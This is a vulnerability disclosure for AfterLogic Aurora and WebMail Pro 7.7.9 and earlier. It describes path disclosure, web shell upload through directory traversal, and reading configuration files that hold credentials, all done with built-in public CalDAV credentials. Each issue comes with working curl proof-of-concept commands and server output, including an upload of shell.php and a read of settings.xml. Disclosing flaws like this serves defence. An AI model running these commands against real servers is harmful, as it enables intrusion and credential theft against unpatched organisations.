The severity of the issue: Medium
Complexity: Easy
Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO
Authentication: Not required
Attacks: Full Path Disclosure
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.
Get the web root path with the following curl command
curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
<?xml version="1.0" encoding="utf-8"?>
<d:error xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns">
<s:exception>Sabre\DAV\Exception\NotFound</s:exception>
<s:message>File with name /var/www/html/www/webmailpro.dev/data/files/private/caldav_public_user@localhost/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 could not be located</s:message>
</d:error>
In this scenario : /var/www/html/www/webmailpro.dev is the web root path, this data is especially becomes valuable for the file upload vulnerabilities.
Get web root path vulnerability starts on step 7 / getChild, at the \Sabre\DAV\Exception\NotFound(‘File with name ’ . $path . ’ could not be located’) line $path variable contains web root path
With the above problem any loggable user can obtain web root path, with the caldav_public_user@localhost user, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible.
Base Score: 9.8 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Complexity: Easy
Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO
Authentication: Not required
Attacks: Directory Traversal, Unrestricted Upload of File with Dangerous Type, Public Built-in Credentials For Critical Function
Gained Access: WebServer user ( Apache, Nginx, Etc… )
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP PUT request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to create/overwrite files with malicious files such as web shells or database dumpers, etc.
After uploading a malicious PHP file to the web server, some example actions that the attacker can do;
Etc…
Upload the malicious file with the following curl command
curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
As the AfterLogic WebMail Pro docs mentioned “the web root usually looks like /var/www/html” and at the above PoC assumes files are located under apache’s standard /var/www/html path, it may differ due to configuration but it’s not a block for the attacker because we realized that some of the EndPoints expose the document root path when the invalid path parameter requested.
Ways to figure out document root directory on customized web server configurations;
curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
Unrestricted Upload of File with Dangerous Type, Directory Traversal problem starts on step 2 / exec, it doesn’t sanitize given parameters and checks the file extension which with that way attacker able to write upper directories and execute the malicious file
With the above problem any loggable user can uploads malicious files, with the caldav_public_user@localhost users, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible.
Base Score: 7.5 HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Complexity: Easy
Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO
Authentication: Not required
Attacks: Directory Traversal, Public Built-in Credentials For Critical Function
https://owasp.org/www-community/attacks/Path_Traversal
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root.
Read any file with the following curl command
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
The sample curl command will get the license key, database credentials, admin panel credentials, etc
Directory Traversal problem starts on step 2 / exec, it doesn’t sanitize given parameters and checks the file extension when it’s combined the httpGet business login ( reading file content and returning ) the attacker able to read any file under the webroot.
With the above problem any loggable user can read configuration files, with the caldav_public_user@localhost users, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible.